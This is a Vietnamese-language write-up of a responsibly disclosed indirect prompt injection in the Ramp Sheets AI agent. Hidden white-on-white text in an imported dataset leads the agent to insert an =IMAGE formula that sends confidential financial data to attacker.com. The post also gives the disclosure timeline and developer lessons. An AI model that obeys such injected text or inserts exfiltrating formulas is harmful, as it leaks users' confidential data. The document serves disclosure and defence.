Tóm tắt
Ramp Sheets AI là agentic product hỗ trợ thao tác trên spreadsheet, tương tự Claude for Excel. Tính năng này có thể edit spreadsheet không cần human-in-the-loop và đã có lỗ hổng data exfiltration vì khả năng chèn formula trigger external communication.
Vulnerability đã được Ramp’s security team xác nhận resolved vào 16/3/2026 sau responsible disclosure từ PromptArmor.
Bài này demo cách indirect prompt injection giấu trong dataset external (untrusted) có thể trigger exfiltration dữ liệu tài chính confidential từ workspace của user — bằng cách manipulate Ramp’s AI chèn malicious formula. Không cần user approval.
PromptArmor trước đây đã identify risk tương tự trong Claude for Excel.
Attack chain
1. User mở workbook chứa financial model confidential
Một financial model được mở trong Ramp AI Sheets.
2. User import external dataset để bổ sung model
Một spreadsheet chứa industry growth statistics được import vào tab riêng. User muốn so sánh growth công ty với benchmark ngành. Reference dataset này đến từ untrusted external source — website, email, shared drive.
3. Reference dataset chứa prompt injection ẩn
Một indirect prompt injection được giấu trong text trắng-trên-trắng, được craft để manipulate Ramp’s AI:
- Thu thập sensitive data
- Generate formula chứa data đó để gửi external network request
- Tự động chèn formula vào spreadsheet user
4. User hỏi Ramp AI một câu query thông thường
User submit query vô hại cho Ramp AI — ví dụ: so sánh financial model với industry statistics.
5. Ramp AI fall vào prompt injection và chèn malicious formula
Ramp AI bị manipulate để build formula IMAGE dùng URL của attacker và append sensitive data của victim vào cuối link:
=IMAGE("https://attacker.com/visualize.png?{victim_sensitive_financial_data_here}")6. Malicious formula gửi network request, exfil data tài chính
Ramp AI chèn malicious formula không yêu cầu user approval. Formula này trigger network request đến server của attacker. Request expose sensitive financial data từ sheet “Financial Model” confidential ban đầu (Ramp AI include data đó vào formula vì prompt injection của attacker).
Server log của attacker hiển thị sensitive financial data của victim.
Responsible disclosure
PromptArmor Threat Intel Team đã responsibly disclose vulnerability này cho Ramp. Ramp’s security team confirm issue resolved vào 16/3/2026.
Timeline
- 19/2/2026: PromptArmor disclose qua security@ramp.com
- 27/2/2026: PromptArmor follow up
- 13/3/2026: PromptArmor follow up
- 14/3/2026: Ramp confirm nhận report, ghi rằng report ban đầu submit trong thời gian transition disclosure program nên có delay
- 16/3/2026: Ramp xác nhận: “Issue đã được resolve hôm nay khoảng 12h trưa eastern time”
Claude for Excel đã remediate thế nào
Khi Claude for Excel release, PromptArmor identify risk gần như identical — malicious formula có thể trigger data exfiltration mà user không có cơ hội review đầy đủ.
Note: Claude for Excel có leverage human-in-the-loop, nhưng malicious formula không visible trong editing approval prompt — làm giảm hiệu quả của protection.
Anthropic update Claude for Excel để hiển thị red warning interstitial khi formula có thể cause external network traffic được chèn. Warning mới hiển thị toàn bộ formula đang được chèn, và documentation được update để inform user về risk.
Dev nên quan tâm vì
Nếu bạn đang build agent có quyền ghi vào spreadsheet (hoặc tool nào đó execute formula/code), pattern này cực kỳ phổ biến và nguy hiểm:
- Untrusted input + write capability = exfil channel: nếu agent đọc data từ external source (file user upload, web scrape, email) và có quyền chèn formula/code, attacker có channel exfil ngay trong tool.
- Human-in-the-loop chỉ effective khi formula visible: nếu approval UI ẩn formula thật sự đang chèn, user click “approve” mà không thấy gì sai.
- Formula
IMAGE,HYPERLINK,WEBSERVICElà vector classic — bất kỳ formula nào trigger network request đều cần special handling khi được AI chèn từ untrusted context.